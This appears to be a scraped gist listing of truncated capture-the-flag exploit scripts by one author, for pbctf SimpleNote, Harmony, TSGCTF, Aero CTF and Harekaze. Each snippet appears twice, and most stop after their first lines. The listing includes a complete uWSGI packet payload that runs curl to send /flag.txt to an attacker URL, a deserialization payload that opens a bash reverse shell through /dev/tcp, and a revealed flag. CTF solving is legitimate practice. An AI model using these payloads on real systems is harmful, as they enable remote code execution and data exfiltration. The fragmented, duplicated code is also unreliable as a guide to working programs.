shpik shpik-kr

## pbctf2020_simplenote.py
import requests

url = "http://simplenote.chal.perfect.blue/"

data = '\x00\xdc\x00\x00\x0f\x00SERVER_PROTOCOL\x08\x00HTTP/1.1\x0e\x00REQUEST_METHOD\x03\x00GET\t\x00PATH_INFO\x01\x00/\x0b\x00REQUEST_URI\x01\x00/\x0c\x00QUERY_STRING\x00\x00\x0b\x00SERVER_NAME\x00\x00\t\x00HTTP_HOST\x08\x00app:4444\n\x00UWSGI_FILE<\x00exec://curl http://[YOUR_URL]:10101 --data "`cat /flag.txt`"\x0b\x00SCRIPT_NAME\x01\x00a'
r = requests.post(url, data = data)

## harmony_chat.py
import websockets
import asyncio
import json
import socket

host = "ws://harmony-1.hackable.software:3380/chat"

payload = '{"script-sample":{"toString":{"___js-to-json-class___":"Function","json":"console.log(global.process.mainModule.require(`child_process`).execSync(`bash -c \'bash -i >& /dev/tcp/<host>/<port> 0>&1\'`))"}},"document-uri":"a","referrer":"b","violated-directive":"c","effective-directive":"d","original-policy":"e","disposition":"f","blocked-uri":"g","line-number":1,"source-file":"1","status-code":"a"}}'

def register(username):

## beginners-capsule
var __classPrivateFieldSet = function(receiver, privateMap, value) {
        if (!privateMap.has(receiver)) {
            throw new TypeError(
                "attempted to set private field on non-instance"
            );
        }
        privateMap.set(receiver, value);
        console.log(privateMap.get(flag));
        return value;
    };

## README.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                shpik-kr
                / README.md
            
            
              Created
              July 12, 2020 08:05
            
              
                beginner_web
              
          
    Chaining this, then you can get flag.
Query1: input=FLAG_[YOUR_SESSIONID]&converter=__defineSetter__
Query2: input=FLAG_[YOUR_SESSIONID]&converter=__lookupSetter__

FLAG: TSGCTF{Goo00o0o000o000ood_job!_you_are_rEADy_7o_do_m0re_Web}

  
## exp.py
#!/usr/bin/python
import requests
import os
import threading
import yaml
import subprocess

'''
Vulnerabilities:
1. Directory Traversal + File upload: User can upload to the parent folder because of tarfile.tar's extractall.

## plane_market.py
from pwn import *

#r = process('./plane_market')
r = remote('tasks.aeroctf.com', 33087)


c0 = lambda:r.recvuntil(':')
c1 = lambda:r.recvuntil('>')
s = lambda x:r.send(str(x))
sl = lambda x:r.sendline(str(x))

## csp.py
'''
1. hash length extension: Make multi query.
2. header injection: Remove CSP header, and XSS occur
'''

import hashpumpy
import requests

b64e = lambda x:x.encode('base64').replace('\n','')

## exp.py
import requests
import urllib
import json

url = lambda x:"http://mashiro.kr:13000/search?limit=%s"%urllib.quote(x)

cnt = 0
pw = ''
for i in range(1,33):
    tmp = 0

## harekaze_note.py
from pwn import *

r = process('./note')
#r = remote('problem.harekaze.com',20003)
#context.log_level = 'debug'
e = ELF('./note')
l = e.libc

s = lambda x:r.send(str(x))
sl = lambda x:r.sendline(str(x))
	import requests

	url = "http://simplenote.chal.perfect.blue/"

	data = '\x00\xdc\x00\x00\x0f\x00SERVER_PROTOCOL\x08\x00HTTP/1.1\x0e\x00REQUEST_METHOD\x03\x00GET\t\x00PATH_INFO\x01\x00/\x0b\x00REQUEST_URI\x01\x00/\x0c\x00QUERY_STRING\x00\x00\x0b\x00SERVER_NAME\x00\x00\t\x00HTTP_HOST\x08\x00app:4444\n\x00UWSGI_FILE<\x00exec://curl http://[YOUR_URL]:10101 --data "`cat /flag.txt`"\x0b\x00SCRIPT_NAME\x01\x00a'
	r = requests.post(url, data = data)
	import websockets
	import asyncio
	import json
	import socket

	host = "ws://harmony-1.hackable.software:3380/chat"

	payload = '{"script-sample":{"toString":{"___js-to-json-class___":"Function","json":"console.log(global.process.mainModule.require(`child_process`).execSync(`bash -c \'bash -i >& /dev/tcp/<host>/<port> 0>&1\'`))"}},"document-uri":"a","referrer":"b","violated-directive":"c","effective-directive":"d","original-policy":"e","disposition":"f","blocked-uri":"g","line-number":1,"source-file":"1","status-code":"a"}}'

	def register(username):
	var __classPrivateFieldSet = function(receiver, privateMap, value) {
	if (!privateMap.has(receiver)) {
	throw new TypeError(
	"attempted to set private field on non-instance"
	);
	}
	privateMap.set(receiver, value);
	console.log(privateMap.get(flag));
	return value;
	};
	#!/usr/bin/python
	import requests
	import os
	import threading
	import yaml
	import subprocess

	'''
	Vulnerabilities:
	1. Directory Traversal + File upload: User can upload to the parent folder because of tarfile.tar's extractall.
	from pwn import *

	#r = process('./plane_market')
	r = remote('tasks.aeroctf.com', 33087)


	c0 = lambda:r.recvuntil(':')
	c1 = lambda:r.recvuntil('>')
	s = lambda x:r.send(str(x))
	sl = lambda x:r.sendline(str(x))
	'''
	1. hash length extension: Make multi query.
	2. header injection: Remove CSP header, and XSS occur
	'''

	import hashpumpy
	import requests

	b64e = lambda x:x.encode('base64').replace('\n','')
	import requests
	import urllib
	import json

	url = lambda x:"http://mashiro.kr:13000/search?limit=%s"%urllib.quote(x)

	cnt = 0
	pw = ''
	for i in range(1,33):
	tmp = 0
	from pwn import *

	r = process('./note')
	#r = remote('problem.harekaze.com',20003)
	#context.log_level = 'debug'
	e = ELF('./note')
	l = e.libc

	s = lambda x:r.send(str(x))
	sl = lambda x:r.sendline(str(x))